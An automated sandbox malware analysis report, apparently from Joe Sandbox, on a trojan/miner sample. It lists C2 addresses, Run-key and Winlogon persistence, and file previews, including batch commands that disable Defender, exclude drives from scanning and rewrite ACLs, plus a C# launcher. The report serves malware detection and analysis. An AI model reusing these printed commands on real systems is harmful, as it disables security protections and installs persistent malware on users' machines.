                                                                                                                                                              https://pypi.org/project/cryptography/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
IP            Domain   Country             ASN     ASN Name                                          Malicious
185.17.0.139  unknown  Russian Federation  50113   SUPERSERVERSDATACENTERRU                          true
45.137.64.40  unknown  Netherlands         204601  ON-LINE-DATAServerlocation-NetherlandsDrontenNL   false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571089
Start date and time: 2024-12-08 23:01:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 69
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
                                                                                                                                                                  Sample name:IYXE4Uz61k.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:0c1cb4cc583aabc07f0482f7e0767ecf.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.spre.troj.adwa.expl.evad.mine.winEXE@116/100@0/2
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 88.9%
                                                                                                                                                                  HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MSTask.exe, PID 3272 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: IYXE4Uz61k.exe
Time | Type | Description
17:01:58 | API Interceptor | 41x Sleep call for process: powershell.exe modified
22:02:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
22:02:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
22:02:51 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
22:03:08 | Autostart | Run: WinLogon Shell "C:\windows\inf\MicrosoftDefenger.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.17.0.139 | fkABXcncEA.exe | Get hash | malicious | RedLine, Xmrig | Browse
• 185.17.0.139:8080/client/setClientStatus?clientId=960781
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | Content Collaboration Terms.dll.exe | Get hash | malicious | LummaC Stealer | Browse
• 185.209.21.227
la.bot.sh4.elf | Get hash | malicious | Unknown | Browse
• 185.231.71.206
x86.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 212.86.109.115
OBS-Studio-30.2.3-Windows-Installer.exe | Get hash | malicious | Unknown | Browse
• 95.215.204.231
5yTEUojIn0.exe | Get hash | malicious | Stealc | Browse
• 77.83.175.91
DihoyYp8ie.exe | Get hash | malicious | Stealc, Vidar | Browse
• 45.88.76.207
Vl9Yz1UB1a.exe | Get hash | malicious | Stealc, Vidar | Browse
• 77.83.175.91
PtGMWtcZF0.exe | Get hash | malicious | Stealc | Browse
• 77.83.175.91
yjNy22UmmY.exe | Get hash | malicious | Stealc | Browse
• 77.83.175.91
g8Z5OO8o6p.exe | Get hash | malicious | Stealc, Vidar | Browse
• 77.83.175.91
SUPERSERVERSDATACENTERRU | qe4efGS22G.exe | Get hash | malicious | Unknown | Browse
• 185.189.14.174
qe4efGS22G.exe | Get hash | malicious | Unknown | Browse
• 185.189.14.174
hidakibest.arm6.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.arm4.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.mips.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.mpsl.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.sparc.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.arm5.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.ppc.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
hidakibest.arm7.elf | Get hash | malicious | Gafgyt, Mirai | Browse
• 185.212.148.212
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe | MicrosoftPrt.exe.exe | Get hash | malicious | Unknown | Browse
MicrosoftPrt.exe.exe | Get hash | malicious | Unknown | Browse
MicrosoftPrt.exe | Get hash | malicious | Unknown | Browse
fkABXcncEA.exe | Get hash | malicious | RedLine, Xmrig | Browse
BZMxi2zof1.exe | Get hash | malicious | RedLine, Xmrig | Browse
migrate.zip | Get hash | malicious | Xmrig | Browse
C:\Users\user\Desktop\Aepdvrho.logfile.exe | Get hash | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar | Browse
gorkmTnChA.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
A5EbyKyjhV.exe | Get hash | malicious | DCRat | Browse
qNdO4D18CF.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
iN1fhAtzW2.exe | Get hash | malicious | DCRat | Browse
based.exe | Get hash | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT | Browse
RustChecker.exe | Get hash | malicious | PureLog Stealer, zgRAT | Browse
main.exe | Get hash | malicious | DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | Browse
file_1443.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
lsass.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):34208376
Entropy (8bit):7.9976397266318
Encrypted:true
SSDEEP:786432:Oo0DUdQuhK/+CGLuoDarzoMQQC5RxAOd99JW88D/N3R:Oo0DU0e3arzSQCnx9JWxb
MD5:02484A615E581A9A431E20DF300FAED4
SHA1:D855E2C9338B1508577B3E831CC89838C2768647
SHA-256:16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
SHA-512:7B69E3E47863EC7EDFA03FA1F25A15C90EE84AEC520FF08D8834B010EB58532F444DAA81056B3DCC7D77F42EB0F390B8490CB59A705FA24B6674A088D796FE57
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 39%
Joe Sandbox View:
• Filename: MicrosoftPrt.exe.exe, Detection: malicious, Browse
• Filename: MicrosoftPrt.exe.exe, Detection: malicious, Browse
• Filename: MicrosoftPrt.exe, Detection: malicious, Browse
• Filename: fkABXcncEA.exe, Detection: malicious, Browse
• Filename: BZMxi2zof1.exe, Detection: malicious, Browse
• Filename: migrate.zip, Detection: malicious, Browse
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-@.`~@.`~@.`~..c.G.`~..e...`~..d.J.`~...~D.`~..e.h.`~..d.Q.`~..c.I.`~..a.K.`~@.a~..`~.d.T.`~.b.A.`~Rich@.`~........................PE..d....)Xe.........."....!.....l................@.............................@......).....`.....................................................x.... ........... ...........0..X... ...................................@............................................text...P........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):50263358
Entropy (8bit):7.999764974460631
Encrypted:true
SSDEEP:786432:22h3MOTX5dPxVIrPYwzQYxwFICPGgtwLqmodhZ//ivKyG6MEHouC72oMChqm6Dab:rh3Xj5gPYwEdmCu+3/w46tHoJLMChqm5
MD5:20737946FC89B9DB44F82EAE5AD41ACB
SHA1:527C9AECC9608D9E5C81D43445B6D7F68F809B4C
SHA-256:0FC38784C09958F10C6D496280615E3CE7E1439A70E28760EAEF7DB316F5B3A6
SHA-512:A207C628BD63119E573C2931129F50CA38A98543A8C0FF43D41FED390D948025A348A28F3544A9106F148AE9147E846D248B765AB180BA382CD5859192846B45
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):32
Entropy (8bit):3.6883072359050906
Encrypted:false
SSDEEP:3:Ljn9GRVJRBJ8K:fkzjj
MD5:11E08B5ABF3F1675F99C96F78C128B23
SHA1:40D6DD08262EF959328AEC4DC5ED07532232037C
SHA-256:50AC09332FF9D6521244B4F9CF6FD9CC489B3324ED1316E07F6A5904230397E7
SHA-512:3005767016B4C5DA031FB2AC5288B01821D54768B5E099E1157D4FA4621A078D589E54D9C5C89DED58AC3CA94395DACBF1D840F9210F909D3C9DFE8092DE8FF9
Malicious:false
Preview:start "" "c:\programdata\st.bat"
Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1041
Entropy (8bit):5.424428309831207
Encrypted:false
SSDEEP:24:5VMjhKYtPzOjuWVlNVwUVlaUVljUVlbUVlLUVlm4UVlB0k7P:54hLPzwblxlflSl6lqlmll7L
MD5:4050181042859E45ECFA6F224AFA79DF
SHA1:E72C9C8BA589B42A82792D8F7E794B79D8E831E3
SHA-256:9DF0FF284989B10162CFFB51D9873C6743FFB83F6D7C4B869A8193E6D6AC63E9
SHA-512:DE2740437A431403AC89577F1F570A78269F0F24C58B531E7522542E60A668D7DA355BE3A126AC2FC4472282C0B06D8B217EC62F04ED5E6AAB0BA9C8D27C54CE
Malicious:false
Preview:@echo off..chcp 65001......copy "c:\programdata\1.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"......tasklist /FI "IMAGENAME eq Superfetch.exe" 2>NUL | find /I /N "Superfetch.exe">NUL..if "%ERRORLEVEL%"=="0" exit..takeown /f c:\windows\tasks..TIMEOUT /T 3 /NOBREAK..powershell Set-MpPreference -DisableRealtimeMonitoring $True..powershell Set-MpPreference -ExclusionPath c:\..icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "%username%:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "%domain%%username%:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"..TIMEOUT /T 3 /NOBREAK..c:\programdata\migrate.
Process:C:\Windows\Bridgeprovider.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1915
Entropy (8bit):5.363869398054153
Encrypted:false
SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.378656660173192
Encrypted:false
SSDEEP:48:7WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuZ:7LHyIFKL3IZ2KRH9OugbZ
MD5:037238069E4B17EEEE04958C9C5647FE
SHA1:C965B7C16C145D237BEA6CD96F7CC37EF5F00C35
SHA-256:02D9546A015666611D4FA21C3932180DF34CD74B7B505DAFC7BD1D59B07577CA
SHA-512:EC5B7365339B2FB87FC604C87439CBE62DAE6D9E5B837E33897B4116421A2195E1E05597CBF1B3D8732FDAB54F4C747CD1AD0A52ADBA35649738FAF5277F73EF
Malicious:false
Process:C:\Windows\Bridgeprovider.exe
File Type:C++ source, Unicode text, UTF-8 (with BOM) text
Category:dropped
Size (bytes):383
Entropy (8bit):4.886336955366934
Encrypted:false
SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2DkMZX3iFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLIz
MD5:655A11EE83DEC19A6FEEED937BD221A4
SHA1:B575D0A0889613AC6C7D29999943ABBFDC76B867
SHA-256:ED1169390C20891D3994578A4022F0C0AE2860B28A11E11BCC5A529C3832A222
SHA-512:222A942FC06DD7ECB64CCE29172793A60DAD1AB0DD6E710FDD24755A535CEA095F3F292D2EFA31E39D52CD062BCA8F30432A62E5091609A1C34BDBA143E6FAE6
Malicious:false
Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\windows\inf\MicrosoftDefenger.exe"); } catch { } }).Start();. }.}.
Process:C:\Windows\Bridgeprovider.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):250
Entropy (8bit):5.166726947195435
Encrypted:false
SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fPOUBV7:Hu7L//TRq79cQWfVv7
MD5:7A047189AD671699B450759CCD3FEAD0
SHA1:EF20C05130498000A33A3DB7D423F3D8663A7382
SHA-256:6BA2B55F3E64EA4980AFE66EB712B034706ACDB516B7F2B7F88C8852BE4C5216
SHA-512:65ED11F66CC5FCB00DF59914D445C72A7ED395AD49198A2A0521BE7D67FC4884EC71AB03923CD88B4C32DABDEA1BF48335EE4558902B81642A5E753FCF3F08FD
Malicious:true
Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.0.cs"
Process:C:\Windows\Bridgeprovider.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (317), with CRLF, CR line terminators
Category:modified
Size (bytes):738
Entropy (8bit):5.277348515707714
Encrypted:false
SSDEEP:12:xkRI/u7L//TRq79cQWfVv6KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:QI/un/Vq79tWfcKax5DqBVKVrdFAMBJj
MD5:34C3FB31F755C142003FFF33F0ABC078
SHA1:50F27551982678D28D98440610D7B94AF1F7F044
SHA-256:0C6380F6F7DF247B5A63F7647E83785196A85BF389911B2E5C2C035060EE8B50
SHA-512:D1F170D5C3158847E5ECD71277E0A6C03FF83CF5D46812291E8CDE20C71A6E4431F1E557596411198A1274C9D1F7600C9F3F37BF464DB77D21AA3C03B3141AEE
Malicious:false
Preview:.C:\Windows> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
Process:C:\Windows\Bridgeprovider.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):25
Entropy (8bit):4.403856189774723
Encrypted:false
SSDEEP:3:+X487NUj0:+v7NUw
MD5:CE85D7789CE7FA9FB80A7C8F8265F057
SHA1:1395B874C90EEE02BA771A879E5B625F6A5557B0
SHA-256:C02AC067EB64FC2B68E874D73861708EB2E969DED90FF637D2F214F968660E43
SHA-512:E662FCEFEC73CDDCE4F858EE242A5EE7A4EB578D812B177DAD13B2F85910616274531C49AD3A97A459DC3F6207374DE6C8547F1698452D2AC6297E1D0F761C22
Malicious:false
Preview:6T9ktMGa5ewnmSyJ0qFyXIwcM
Process:C:\Windows\Bridgeprovider.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):212
Entropy (8bit):5.093694819180712
Encrypted:false
SSDEEP:6:hCijTg3Nou1SV+DE3kMZXIKOZG1wkn23fIeG:HTg9uYDE3PyfAeG
MD5:9510D9E0DABE623B4921AA5CB1E05227
SHA1:941994E034D68CD7A4CE4161BAC72682FD8A551E
SHA-256:A89015ECC45BA69D841CA539D220C4428377B327A8D20CAB9B56F871BA471789
SHA-512:F559B567B1D9A1333E580819617D1348523755681641AEC4C83C008A3434044C9043D3909957A091002DB5E723E22C263AA94D38E036E652C4148AAF41A8BB9E
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\windows\inf\MicrosoftDefenger.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EekRrdxVrk.bat"
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7268314866273835
Encrypted:false
SSDEEP:96:McoG3Cep5WkvhkvCCt2py5LwHZpy5LwHC:Mcoq3C2g5LGg5LX
MD5:9490228CE0E07B04BBEB51689EB50F9C
SHA1:8EDBBD3A3CF4223F3E27486FBE1FE40CA15CA8C3
SHA-256:9B0282835EF5C2CB19966AD835ACB68FEAC732ABB455D6A1E645BF8B6FCCBDF3
SHA-512:47FCF3141C9293A862E0B8773503D79667968D581B3EA596009CAF9F6B7A800883C5D586BBEE7A482FE1C233DF6D3F0E5F8E04DD1EF0470D8449E2372F8EDBC9
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7319723140970913
Encrypted:false
SSDEEP:96:hcp33CxH5WkvhkvCCt2py5LwHZpy5LwHC:hcpyZC2g5LGg5LX
MD5:5537B69E98DC0F6A0091A0B126967B6F
SHA1:E033F6D85F26322176FBA66284B4C04CD35473E1
SHA-256:6EBD1EF364F7DCBA0CE3FCAAE2ECA0BB6AB6CB3277A1BFDC62DDEF927124B81F
SHA-512:DCC79D54028E2002E9FDEF0C61E0B97F10D596BEDA50D5F04E35A895383CCF535E8CF8BF862F0424369C6527914F8BBE7E253BA03DAD0C5D346B6E50FB5C2C1C
Malicious:false
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6221
                                                                                                                                                                                                  Entropy (8bit):3.7319723140970913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:hcp33CxH5WkvhkvCCt2py5LwHZpy5LwHC:hcpyZC2g5LGg5LX
                                                                                                                                                                                                  MD5:5537B69E98DC0F6A0091A0B126967B6F
                                                                                                                                                                                                  SHA1:E033F6D85F26322176FBA66284B4C04CD35473E1
                                                                                                                                                                                                  SHA-256:6EBD1EF364F7DCBA0CE3FCAAE2ECA0BB6AB6CB3277A1BFDC62DDEF927124B81F
                                                                                                                                                                                                  SHA-512:DCC79D54028E2002E9FDEF0C61E0B97F10D596BEDA50D5F04E35A895383CCF535E8CF8BF862F0424369C6527914F8BBE7E253BA03DAD0C5D346B6E50FB5C2C1C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......I..>~..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................W..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................,...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                   Joe Sandbox View:
                                                                                                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: gorkmTnChA.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: A5EbyKyjhV.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: qNdO4D18CF.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: iN1fhAtzW2.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: based.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: RustChecker.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: main.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: file_1443.exe, Detection: malicious
                                                                                                                                                                                                   • Filename: lsass.exe, Detection: malicious
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
